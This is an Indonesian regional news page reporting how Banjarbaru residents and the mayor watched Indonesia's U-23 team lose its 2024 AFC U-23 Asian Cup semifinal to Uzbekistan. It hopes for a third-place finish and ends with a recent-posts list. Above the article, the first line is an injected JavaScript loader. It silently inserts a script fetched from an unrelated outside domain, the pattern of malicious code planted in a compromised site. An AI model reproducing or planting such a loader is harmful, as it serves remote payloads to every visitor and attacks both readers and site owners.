(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Laga Terakhir Timnas Indonesia Berharap Juara Ketiga Piala Asia U-23


KANALKALIMANTAN.COM, BANJARBARU – Tim Nasional (Timnas) Indonesia U-23 dipastikan gagal melaju ke final Piala Asia U-23 atau AFC U-23 2024.

Kali ini, ribuan pendukung setia skuat Garuda di Ibu Kota Provinsi Kalimantan Selatan (Kalsel) juga harus mengakui keunggulan sang lawan.

Dihadapan LCD videotron besar di halaman Balai Kota Banjarbaru, ribuan penonton harus menelan kecewa karena Garuda Muda kalah di babak semi final dengan skor 2-0 dari Timnas Uzbekistan.

Meski begitu penampilan bagus Timnas Indonesia U-23 saat tampil di Piala Asia U-23 2024 mendapatkan perhatian dari warga di ibu kota Kalsel.

Baca juga: Kadis Pariwisata Tala dan Bendahara Disidang Kasus Korupsi Retribusi Asuransi Wisata

Seperti dikatakan Muhammad Alifudin, bahwa kesuksesan Garuda Muda dalam menampilkan performa apik ini tak lepas dari kerja keras para pemain, pelatih, serta pendukung tim lainnya.

“Cukup bangga sebagai penonton, karena permainan sangat bagus dan cukup sengit, terima kasih kepada Timnas sudah berjuang hingga babak semi final ini,” ungkap salah satu penonton nobar di Balai Kota Banjarbaru, Muhammad Alifudin, Selasa (30/4/2024) dini hari.

Dengan performa yang diperlihatkan skuat Garuda Muda, tak hayal penonton berharap Timnas Indonesia dapat kembali memperebutkan juara di tahun yang akan datang.

Baca juga: Atraksi Ritual Laluhan Warnai Hari Jadi ke-218 Kota Kuala Kapuas

“Mungkin di lain waktu bisa lebih bagus lagi, kita berdoa semoga di tahun yang akan datang Timnas Indonesia bisa juara satu,” sambung dia.

Wali Kota Banjarbaru Aditya Mufti Ariffin selaku penyelenngara nonton bareng di Balai Kota turut menonton di depan layar LCD itu mengakui jika skuat Garuda Muda telah bermain dengan sepenuh hati.

Wali Kota Banjarbaru Aditya Mufti Ariffin ikut menonton semifinal Piala Asia U-23 Timnas lndonesia VS Uzbekistan, Senin (29/4/2024) malam. Foto: wanda

“Walaupun hari ini kita kalah tetapi dengan perjuangan Garuda Muda kita melihat di pertandingan, mereka sudah berjuang sepenuh hati,” ungkap Wali Kota Aditya pasca laga.

Diketahui, perjalanan Timnas Indonesia U-23 di Piala Asia U-23 2024 belum selesai. Karena skuat Timnas Garuda akan memainkan satu pertandingan terakhir perebutkan posisi ketiga.

Baca juga: Dear Pencari Kerja: Ratusan Lowongan Kerja Tersedia di Banjarbaru Job Fair 2024

Perebutan juara tiga nanti akan mempertemukan Timnas Indonesia U-23 dengan tim yang kalah di semifinal berikutnya.

Di pertandingan yang akan datang, dirinya berharap Timnas Indonesia dapat menyabet juara ketiga.

“Insyaallah pada pertandingan selanjutnya kita kembali adakan nobar, yang penting kita berharap semuanya tetap semangat dari pemain sampai seluruh pendukungnya,” tutup Aditya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

3 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

4 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

4 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

4 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

8 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

10 jam ago

This website uses cookies.